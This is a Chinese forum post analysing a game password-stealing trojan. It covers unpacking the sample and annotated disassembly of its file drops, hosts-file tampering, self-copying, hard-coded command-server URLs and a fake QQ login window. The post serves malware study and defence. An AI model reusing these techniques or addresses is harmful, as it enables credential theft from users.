首页
论坛
专栏
课程

[病毒木马] [原创]某游戏盗号木马粗略分析

2016-11-12 15:19 3205

[病毒木马] [原创]某游戏盗号木马粗略分析

2016-11-12 15:19
3205
http://bbs.duba.net/thread-22747123-1-1.html


最新学习木马分析,本人小试牛刀,分析难免有些失误加上程序无法联机(服务器不再维护了),还请各位大牛批评指正,这是网上找到的一个样本,拿出来给大家分享一下(我分析的是样本2)。
PS: 盗号木马是指隐秘在电脑中的一种恶意程序,跟灰鸽子不同,这是以盗号为目的并且能够伺机盗取各种需要密码的账户(游戏,应用程序等)是属于网游木马的一种。

   
第一部分:介绍调试需要的工具


0x1 虚拟机 WinXP SPack 3
0x2 IDA 6.1
0x3 Ollydbg
0x4 样本(见附件)。


第二部分:观察木马行为(提示:虚拟机关闭文件共享功能,重要的资料不要放在虚拟机)


NO.1 虚拟机联网同时打开一个名字叫做QQLogin.exe(名字改成他就行)的程序,
先打开打开任务管理器,
接着单机样本,发现样本文件执行一会消失了,随后多了两个进程一个是sockhelp32.exe,
另一个是scansock.exe 。
NO.2 虚拟机断网同时打开一个名字叫做QQLogin.exe(名字改成他就行)的程序,
单机样本,看到和之前一样,但是最新打开的QQLogin。exe的程序竟然被关闭了,却而代之的是一个登陆界面。(可惜木马太老了作者已经停止维护了,
所以联网情况下找不到服务器退出了,很遗憾不能跟踪到作者的邮箱了)


第三部分:脱壳

先用PEID 查一下文件加了什么壳,

上面可以看到该木马加了Upack 0.28 - 0.399 的壳。 怎么脱壳:很简单,用Od载入


        
00558333     E9 22F3EFFF     jmp c1.0045765A;单步下面也一样
0045765A     E8 21640000    call c1.0045DA80
0045765F     E9 79FEFFFF     jmp c1.004574DD
004574DD    6A 58                 push 0x58
004574DF    68 30E14800     push c1.0048E130
004574E4    E8 D3450000     call c1.0045BABC

然后执行 插件-》Ollydump-》脱壳在当前调试的进程 点击。

由于水平有限,此次脱壳不完美,能分析就行了。   

  
第四部分:分析(由于程序用的是同一个文件,只因在运行中判断当前进程名而执行不同的指令)

将脱壳后保存为dump1.exe的程序拖入IDA,可以看到

至于为什么会直接显示C++代码呢?有个小技巧:在某个汇编代码处按下F5就可以还原成C++代码了,IDA果然是什么神器,这样不就一目了然了,当然从这里看不出啥猫腻。
接着用Od载入我们勉强脱完壳的程序。
经过调试发现,咱们要进入程序开始原形毕露的地方,先要在
0046FD46    FF50 50         call dword ptr ds:[eax+0x50]
下个断点,单击选中要下断点的地方,按下F2,取消也是这样。
让程序运行到这里停下,F7单步进入到函数内部,

004108B0    55              push ebp
004108B1    8BEC            mov ebp,esp
004108B3    83E4 F8         and esp,0xFFFFFFF8
004108B6    6A FF           push -0x1
004108B8    68 BD4C4700     push dump1.00474CBD
004108BD    64:A1 00000000  mov eax,dword ptr fs:[0]
004108C3    50              push eax
004108C4    51              push ecx
004108C5    B8 80280000     mov eax,0x2880
004108CA    E8 31B80400     call dump1.0045C100
004108CF    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
004108D4    33C4            xor eax,esp
004108D6    898424 7C280000 mov dword ptr ss:[esp+0x287C],eax
004108DD    56              push esi
004108DE    57              push edi
004108DF    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
004108E4    33C4            xor eax,esp
004108E6    50              push eax
004108E7    8D8424 90280000 lea eax,dword ptr ss:[esp+0x2890]
004108EE    64:A3 00000000  mov dword ptr fs:[0],eax
004108F4    8D4424 0C       lea eax,dword ptr ss:[esp+0xC]
004108F8    50              push eax
004108F9    8BF9            mov edi,ecx
004108FB    C74424 10 08000>mov dword ptr ss:[esp+0x10],0x8
00410903    C74424 14 FF000>mov dword ptr ss:[esp+0x14],0xFF
0041090B    FF15 28604700   call dword ptr ds:[<&comctl32.InitCommonControls>; comctl32.InitCommonControlsEx
00410911    8BCF            mov ecx,edi
00410913    E8 76450300     call dump1.00444E8E
00410918    6A 00           push 0x0
0041091A    E8 FC550300     call dump1.00445F1B
0041091F    83C4 04         add esp,0x4
00410922    68 28E34700     push dump1.0047E328 ; UNICODE "DNF"
00410927    8BCF            mov ecx,edi
00410929    E8 C05A0300     call dump1.004463EE
0041092E    E8 4DCFFFFF     call dump1.0040D880; 释放文件(函数内部流程见下文)

dump1.0040D880函数内部:
代码 :
0040D880    55              push ebp
0040D881    8BEC            mov ebp,esp
0040D883    81EC 60020000   sub esp,0x260
0040D889    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
0040D88E    33C5            xor eax,ebp
0040D890    8945 FC         mov dword ptr ss:[ebp-0x4],eax
0040D893    53              push ebx
0040D894    56              push esi
0040D895    57              push edi
0040D896    8B3D F0624700   mov edi,dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA
0040D89C    68 2C010000     push 0x12C
0040D8A1    8D85 D0FEFFFF   lea eax,dword ptr ss:[ebp-0x130]
0040D8A7    50              push eax
0040D8A8    FFD7            call ed; 获取系统目录
0040D8AA    8B1D 38634700   mov ebx,dword ptr ds[<&kernel32.lstrcat>];kernel32.lstrcatA
0040D8B0    68 28DF4700     push dump1.0047DF28 ; ASCII "\dnfset.cyc"
0040D8B5    8D8D D0FEFFFF   lea ecx,dword ptr ss:[ebp-0x130]
0040D8BB    51              push ecx
0040D8BC    FFD3            call ebx
0040D8BE    6A 00           push 0x0
0040D8C0    6A 00           push 0x0
0040D8C2    6A 04           push 0x4
0040D8C4    6A 00           push 0x0
0040D8C6    6A 01           push 0x1
0040D8C8    68 00000080     push 0x80000000
0040D8CD    8D95 D0FEFFFF   lea edx,dword ptr ss:[ebp-0x130]
0040D8D3    52              push edx
0040D8D4    FF15 EC624700   call dword ptr ds:[<&kernel32.CreateFileA>]; 释放dnfset.cyc到system32目录
0040D8DA    6A 00           push 0x0
0040D8DC    6A 00           push 0x0
0040D8DE    8BF0            mov esi,eax
0040D8E0    6A 00           push 0x0
0040D8E2    56              push esi
0040D8E3    FF15 E8624700   call dword ptr ds:[<&kernel32.SetFilePointer>]; kernel32.SetFilePointer
0040D8E9    6A 00           push 0x0
0040D8EB    8D85 A0FDFFFF   lea eax,dword ptr ss:[ebp-0x260]
0040D8F1    50              push eax
0040D8F2    68 6C020000     push 0x26C
0040D8F7    68 28FA4900     push dump1.0049FA28 ; ASCII "http://183.60.203.82:5566/f/w11/get.asp"
0040D8FC    56              push esi
0040D8FD    FF15 E4624700   call dword ptr ds:[<&kernel32.ReadFile>]; 从http://183.60.203.82:5566/f/w11/get.asp 读取信息
0040D903    56              push esi
0040D904    8B35 20634700   mov esi,dword ptr ds:[<&kernel32.CloseHandle>]; kernel32.CloseHandle
0040D90A    FFD6            call esi
0040D90C    E8 2FFFFFFF     call dump1.0040D840
0040D911    68 2C010000     push 0x12C
0040D916    8D8D A4FDFFFF   lea ecx,dword ptr ss:[ebp-0x25C]
0040D91C    51              push ecx
0040D91D    FFD7            call edi
0040D91F    68 34DF4700     push dump1.0047DF34 ; ASCII "\drivers\etc\hosts"
0040D924    8D95 A4FDFFFF   lea edx,dword ptr ss:[ebp-0x25C]
0040D92A    52              push edx
0040D92B    FFD3            call ebx
0040D92D    6A 00           push 0x0
0040D92F    6A 00           push 0x0
0040D931    6A 02           push 0x2
0040D933    6A 00           push 0x0
0040D935    6A 01           push 0x1
0040D937    68 00000040     push 0x40000000
0040D93C    8D85 A4FDFFFF   lea eax,dword ptr ss:[ebp-0x25C]
0040D942    50              push eax
0040D943    FF15 EC624700   call dword ptr ds:[<&kernel32.CreateFileA>]; 创建文件hosts于C:\WINDOWS\system32\drivers\etc目录
0040D949    50              push eax
0040D94A    FFD6            call esi
0040D94C    8B4D FC         mov ecx,dword ptr ss:[ebp-0x4]
0040D94F    5F              pop edi
0040D950    5E              pop esi
0040D951    33CD            xor ecx,ebp
0040D953    5B              pop ebx
0040D954    E8 0B9D0400     call dump1.00457664
0040D959    8BE5            mov esp,ebp
0040D95B    5D              pop ebp
0040D95C    C3              retn


分析完call dump1.0040D880继续看下去
00410933    8B35 D4624700   mov esi,dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA
00410939    68 2C010000     push 0x12C
0041093E    8D8C24 18220000 lea ecx,dword ptr ss:[esp+0x2218]
00410945    51              push ecx
00410946    6A 00           push 0x0
00410948    FFD6            call esi
0041094A    8D9424 14220000 lea edx,dword ptr ss:[esp+0x2214]
00410951    68 30E34700     push dump1.0047E330 ; ASCII "sockhelp"
00410956    52              push edx
00410957    E8 E4800400     call dump1.00458A40  ; 判断进程名是不是sockhelp32.exe?
0041095C    83C4 08         add esp,0x8
0041095F    85C0            test eax,eax
00410961    74 3A           je short dump1.0041099D ; 如果是则不跳
00410963    8B35 DC624700   mov esi,dword ptr ds:[<&kernel32.CreateThread>]  ; kernel32.CreateThread
00410969    6A 00           push 0x0
0041096B    6A 00           push 0x0
0041096D    6A 00           push 0x0
0041096F    68 B0E54000     push dump1.0040E5B0
00410974    6A 00           push 0x0
00410976    6A 00           push 0x0
00410978    FFD6            call esi 创建一个线程,地址40e5b0.获取主机地址
0041097A    E8 71D6FFFF     call dump1.0040DFF0 从网上下载文件(函数内部见下文)

继续看dump1.0040DFF0 内部是啥样
0040DFF0    55              push ebp
0040DFF1    8BEC            mov ebp,esp
0040DFF3    81EC 2C090000   sub esp,0x92C
0040DFF9    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
0040DFFE    33C5            xor eax,ebp
0040E000    8945 FC         mov dword ptr ss:[ebp-0x4],eax
0040E003    53              push ebx
0040E004    56              push esi
0040E005    57              push edi
0040E006    68 CCDF4700     push sockhelp.0047DFCC; ASCII "http://%d.%d.%d.%d:808/GetMeInfo.aspx"
0040E00B    8DBD D8F6FFFF   lea edi,dword ptr ss:[ebp-0x928]
0040E011    E8 4AF9FFFF     call sockhelp.0040D960 ; 获取主机路径 http://218.85.65.150:808/GetMeInfo.aspx
0040E016    83C4 04         add esp,0x4
0040E019    50              push eax
0040E01A    8D85 00FEFFFF   lea eax,dword ptr ss:[ebp-0x200]
0040E020    50              push eax
0040E021    FF15 3C634700   call dword ptr ds:[<&kernel32.lstrcpy>]  ; kernel32.lstrcpyA
0040E027    68 F4DF4700     push sockhelp.0047DFF4 ; ASCII "?act=2"
0040E02C    8D8D 00FEFFFF   lea ecx,dword ptr ss:[ebp-0x200]
0040E032    51              push ecx
0040E033    FF15 38634700   call dword ptr ds:[<&kernel32.lstrcat>]  ; kernel32.lstrcatA
0040E039    8B1D 60664700   mov ebx,dword ptr ds:[<&wininet.Internet>; wininet.InternetCloseHandle
0040E03F    90              nop
0040E040    E8 7BFEFFFF     call sockhelp.0040DEC0 ; 同样获取主机路径
0040E045    6A 00           push 0x0
0040E047    68 00000080     push 0x80000000
0040E04C    6A 00           push 0x0
0040E04E    6A 00           push 0x0
0040E050    8D95 00FEFFFF   lea edx,dword ptr ss:[ebp-0x200]
0040E056    8BF0            mov esi,eax
0040E058    52              push edx
0040E059    56              push esi
0040E05A    FF15 68664700   call dword ptr ds:[<&wininet.InternetOpe>; 通过http://218.85.65.150:808/GetMeInfo.aspx?act=2打开一个资源
0040E060    68 00040000     push 0x400
0040E065    8BF8            mov edi,eax
0040E067    8D85 D0F8FFFF   lea eax,dword ptr ss:[ebp-0x730]
0040E06D    6A 00           push 0x0
0040E06F    50              push eax
0040E070    E8 CBD90400     call sockhelp.0045BA40
0040E075    83C4 0C         add esp,0xC
0040E078    8D8D D4F6FFFF   lea ecx,dword ptr ss:[ebp-0x92C]
0040E07E    51              push ecx
0040E07F    68 00040000     push 0x400
0040E084    8D95 D0F8FFFF   lea edx,dword ptr ss:[ebp-0x730]
0040E08A    52              push edx
0040E08B    57              push edi
0040E08C    C785 D4F6FFFF 0>mov dword ptr ss:[ebp-0x92C],0x0
0040E096    FF15 64664700   call dword ptr ds:[<&wininet.InternetRea>; 读取数据从刚才打开的资源
0040E09C    57              push edi
0040E09D    FFD3            call ebx
0040E09F    56              push esi
0040E0A0    FFD3            call ebx
0040E0A2    80BD D0F8FFFF 6>cmp byte ptr ss:[ebp-0x730],0x6F
0040E0A9    75 19           jnz short sockhelp.0040E0C4
0040E0AB    80BD D1F8FFFF 6>cmp byte ptr ss:[ebp-0x72F],0x6B
0040E0B2    75 10           jnz short sockhelp.0040E0C4
0040E0B4    68 401F0000     push 0x1F40
0040E0B9    FF15 FC624700   call dword ptr ds:[<&kernel32.Sleep>]    ; kernel32.Sleep
0040E0BF  ^ E9 7CFFFFFF     jmp sockhelp.0040E040
0040E0C4    8D85 D0F8FFFF   lea eax,dword ptr ss:[ebp-0x730]
0040E0CA    68 FCDF4700     push sockhelp.0047DFFC  ; UNICODE ";"
0040E0CF    50              push eax
0040E0D0    E8 6BA90400     call sockhelp.00458A40
0040E0D5    83C4 08         add esp,0x8
0040E0D8    85C0            test eax,eax
0040E0DA    75 10           jnz short sockhelp.0040E0EC
0040E0DC    68 401F0000     push 0x1F40 ; 休息8秒
0040E0E1    FF15 FC624700   call dword ptr ds:[<&kernel32.Sleep>]    ; kernel32.Sleep
0040E0E7  ^ E9 54FFFFFF     jmp sockhelp.0040E040 ; 跳回继续循环

分析完call dump1.0040D880继续回来
0041097F    6A 00           push 0x0
00410981    6A 00           push 0x0
00410983    6A 00           push 0x0
00410985    68 40E14000     push dump1.0040E140
0041098A    6A 00           push 0x0
0041098C    6A 00           push 0x0
0041098E    FFD6            call esi
00410990    E8 0BDDFFFF     call dump1.0040E6A0
00410995    6A 00           push 0x0
00410997    FF15 E0624700   call dword ptr ds:[<&kernel32.ExitProcess>] ; kernel32.ExitProcess
0041099D    8D8424 14220000 lea eax,dword ptr ss:[esp+0x2214]
004109A4    68 3CE34700     push dump1.0047E33C ; ASCII "scansock"
004109A9    50              push eax
004109AA    E8 91800400     call dump1.00458A40  ; 判断进程名是不是scansock.exe?
004109AF    83C4 08         add esp,0x8
004109B2    85C0            test eax,eax
004109B4    74 05           je short dump1.004109BB; 是则不跳
004109B6    E8 65DBFFFF     call dump1.0040E520 (详情看下文)

dump1.0040E520 函数内部
0040E520    55              push ebp
0040E521    8BEC            mov ebp,esp
0040E523    81EC 30010000   sub esp,0x130
0040E529    A1 747A4900     mov eax,dword ptr ds:[0x497A74]
0040E52E    33C5            xor eax,ebp
0040E530    8945 FC         mov dword ptr ss:[ebp-0x4],eax
0040E533    53              push ebx
0040E534    8B1D E4634700   mov ebx,dword ptr ds:[<&shell32.ShellExe>; shell32.ShellExecuteA
0040E53A    56              push esi
0040E53B    8B35 D0624700   mov esi,dword ptr ds:[<&kernel32.GetTemp>; kernel32.GetTempPathA
0040E541    57              push edi
0040E542    8B3D A0654700   mov edi,dword ptr ds:[<&user32.wsprintfA>; user32.wsprintfA
0040E548    EB 06           jmp short scansock.0040E550
0040E54A    8D9B 00000000   lea ebx,dword ptr ds:[ebx]
0040E550    68 3CE04700     push scansock.0047E03C ; UNICODE "sockhelp32.exe"
0040E555    E8 F6EEFFFF     call scansock.0040D450; 创建进程快照判断有没有sockhelp32.exe
0040E55A    83C4 04         add esp,0x4
0040E55D    85C0            test eax,eax
0040E55F    75 38           jnz short scansock.0040E599; 没有则不跳
0040E561    8D85 D0FEFFFF   lea eax,dword ptr ss:[ebp-0x130]
0040E567    50              push eax
0040E568    68 2C010000     push 0x12C
0040E56D    FFD6            call esi  ; 获取临时文件夹
0040E56F    8D8D D0FEFFFF   lea ecx,dword ptr ss:[ebp-0x130]
0040E575    51              push ecx
0040E576    8BD1            mov edx,ecx
0040E578    68 5CE04700     push scansock.0047E05C; ASCII "%s\sockhelp32.exe"
0040E57D    52              push edx
0040E57E    FFD7            call edi
0040E580    83C4 0C         add esp,0xC
0040E583    6A 00           push 0x0
0040E585    6A 00           push 0x0
0040E587    6A 00           push 0x0
0040E589    8D85 D0FEFFFF   lea eax,dword ptr ss:[ebp-0x130]
0040E58F    50              push eax
0040E590    68 7CDF4700     push scansock.0047DF7C  ; ASCII "open"
0040E595    6A 00           push 0x0
0040E597    FFD3            call ebx ; 运行 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\sockhelp32.exe
0040E599    68 88130000     push 0x1388
0040E59E    FF15 FC624700   call dword ptr ds:[<&kernel32.Sleep>]    ; kernel32.Sleep
0040E5A4  ^ EB AA           jmp short scansock.0040E550 ; 继续循环


004109BB    68 48E34700     push dump1.0047E348                              ; UNICODE "scansock.exe"
004109C0    E8 8BCAFFFF     call dump1.0040D450; 创建进程快照判断当前进程
004109C5    83C4 04         add esp,0x4
004109C8    85C0            test eax,eax
004109CA    0F85 B2000000   jnz dump1.00410A82 ; 如果是scansock.exe则跳 dump.exe 则不跳
004109D0    68 2C010000     push 0x12C
004109D5    8D8C24 48230000 lea ecx,dword ptr ss:[esp+0x2348]
004109DC    51              push ecx
004109DD    50              push eax
004109DE    FFD6            call esi
004109E0    8D9424 841E0000 lea edx,dword ptr ss:[esp+0x1E84]
004109E7    52              push edx
004109E8    68 2C010000     push 0x12C
004109ED    FF15 D0624700   call dword ptr ds:[<&kernel32.GetTempPathA>]     ; 获取临时文件目录
004109F3    8D8424 841E0000 lea eax,dword ptr ss:[esp+0x1E84]
004109FA    50              push eax
004109FB    8D8C24 E8200000 lea ecx,dword ptr ss:[esp+0x20E8]
00410A02    51              push ecx
00410A03    FF15 3C634700   call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00410A09    8B35 A0654700   mov esi,dword ptr ds:[<&user32.wsprintfA>] ; user32.wsprintfA
00410A0F    8D9424 E4200000 lea edx,dword ptr ss:[esp+0x20E4]
00410A16    52              push edx
00410A17    8BC2            mov eax,edx
00410A19    68 5CE04700     push dump1.0047E05C ; ASCII "%s\sockhelp32.exe"
00410A1E    50              push eax
00410A1F    FFD6            call esi
00410A21    83C4 0C         add esp,0xC
00410A24    8D8C24 841E0000 lea ecx,dword ptr ss:[esp+0x1E84]
00410A2B    51              push ecx
00410A2C    8BD1            mov edx,ecx
00410A2E    68 64E34700     push dump1.0047E364 ; ASCII "%s\scansock.exe"
00410A33    52              push edx
00410A34    FFD6            call esi
00410A36    8B35 A8624700   mov esi,dword ptr ds:[<&kernel32.CopyFileA>]     ; kernel32.CopyFileA
00410A3C    83C4 0C         add esp,0xC
00410A3F    6A 00           push 0x0
00410A41    8D8424 881E0000 lea eax,dword ptr ss:[esp+0x1E88]
00410A48    50              push eax
00410A49    8D8C24 4C230000 lea ecx,dword ptr ss:[esp+0x234C]
00410A50    51              push ecx
00410A51    FFD6            call esi  ; 复制自身并改名为scansock.exe
00410A53    6A 00           push 0x0
00410A55    8D9424 E8200000 lea edx,dword ptr ss:[esp+0x20E8]
00410A5C    52              push edx
00410A5D    8D8424 4C230000 lea eax,dword ptr ss:[esp+0x234C]
00410A64    50              push eax
00410A65    FFD6            call esi  ; 复制自身并改名为sockhelp32.exe
00410A67    6A 00           push 0x0
00410A69    6A 00           push 0x0
00410A6B    6A 00           push 0x0
00410A6D    8D8C24 901E0000 lea ecx,dword ptr ss:[esp+0x1E90]
00410A74    51              push ecx
00410A75    68 7CDF4700     push dump1.0047DF7C ; ASCII "open"
00410A7A    6A 00           push 0x0
00410A7C    FF15 E4634700   call dword ptr ds:[<&shell32.ShellExecuteA>]     ; 并运行这两个文件
00410A82    E8 49D0FFFF     call dump1.0040DAD0   ; 尝试从os.buyaoda.com..c4.buyaoda.com.主机IP由于网页无效所以不能获得 并创建文件dnfhack。py到系统目录下
00410A87    8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4]
00410A8E    52              push edx
00410A8F    E8 8CCBFFFF     call dump1.0040D620
00410A94    83C4 04         add esp,0x4
00410A97    8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4]
00410A9E    50              push eax
00410A9F    FF15 00644700   call dword ptr ds:[<&shlwapi.PathRemoveFileSpecA>; shlwapi.PathRemoveFileSpecA
00410AA5    68 74E34700     push dump1.0047E374; UNICODE "\"
00410AAA    8D8C24 B81F0000 lea ecx,dword ptr ss:[esp+0x1FB8]
00410AB1    51              push ecx
00410AB2    FF15 38634700   call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00410AB8    8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4]
00410ABF    52              push edx
00410AC0    FF15 A4624700   call dword ptr ds:[<&kernel32.SetCurrentDirector>; kernel32.SetCurrentDirectoryA
00410AC6    68 0F040000     push 0x40F
00410ACB    8D8424 78240000 lea eax,dword ptr ss:[esp+0x2478]
00410AD2    50              push eax
00410AD3    6A 00           push 0x0
00410AD5    FF15 B4624700   call dword ptr ds:[<&kernel32.GetModuleFileNameW>; kernel32.GetModuleFileNameW
00410ADB    8D8C24 74240000 lea ecx,dword ptr ss:[esp+0x2474]
00410AE2    8DB7 A4000000   lea esi,dword ptr ds:[edi+0xA4]
00410AE8    51              push ecx
00410AE9    8BCE            mov ecx,esi
00410AEB    E8 003BFFFF     call dump1.004045F0
00410AF0    8B06            mov eax,dword ptr ds:[esi]
00410AF2    6A 5C           push 0x5C
00410AF4    50              push eax
00410AF5    E8 11890400     call dump1.0045940B
00410AFA    83C4 08         add esp,0x8
00410AFD    85C0            test eax,eax
00410AFF    74 19           je short dump1.00410B1A
00410B01    2B06            sub eax,dword ptr ds:[esi]
00410B03    D1F8            sar eax,1
00410B05    8BC8            mov ecx,eax
00410B07    83F9 FF         cmp ecx,-0x1
00410B0A    74 0E           je short dump1.00410B1A
00410B0C    8B16            mov edx,dword ptr ds:[esi]
00410B0E    8B42 F4         mov eax,dword ptr ds:[edx-0xC]
00410B11    41              inc ecx
00410B12    2BC1            sub eax,ecx
00410B14    56              push esi
00410B15    E8 26050000     call dump1.00411040
00410B1A    8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4]
00410B21    50              push eax
00410B22    8BCE            mov ecx,esi
00410B24    E8 97060000     call dump1.004111C0
00410B29    E8 72040000     call dump1.00410FA0
00410B2E    8D4C24 14       lea ecx,dword ptr ss:[esp+0x14]
00410B32    51              push ecx
00410B33    E8 18090000     call dump1.00411450
00410B38    6A 00           push 0x0
00410B3A    C78424 9C280000>mov dword ptr ss:[esp+0x289C],0x0
00410B45    FF15 AC624700   call dword ptr ds:[<&kernel32.RestoreLastError>] ; ntdll.RtlSetLastWin32Error
00410B4B    8D5424 14       lea edx,dword ptr ss:[esp+0x14]
00410B4F    8BCA            mov ecx,edx
00410B51    8957 20         mov dword ptr ds:[edi+0x20],edx
00410B54    E8 CD0A0300     call dump1.00441626; 创建伪造的QQ登陆界面,样本被处理过所以看不清楚


[公告][征集寄语] 看雪20周年年会(12.28上海) | 感恩有你,一路同行

上传的附件:
最新回复 (0)
游客
登录 | 注册 方可回帖
返回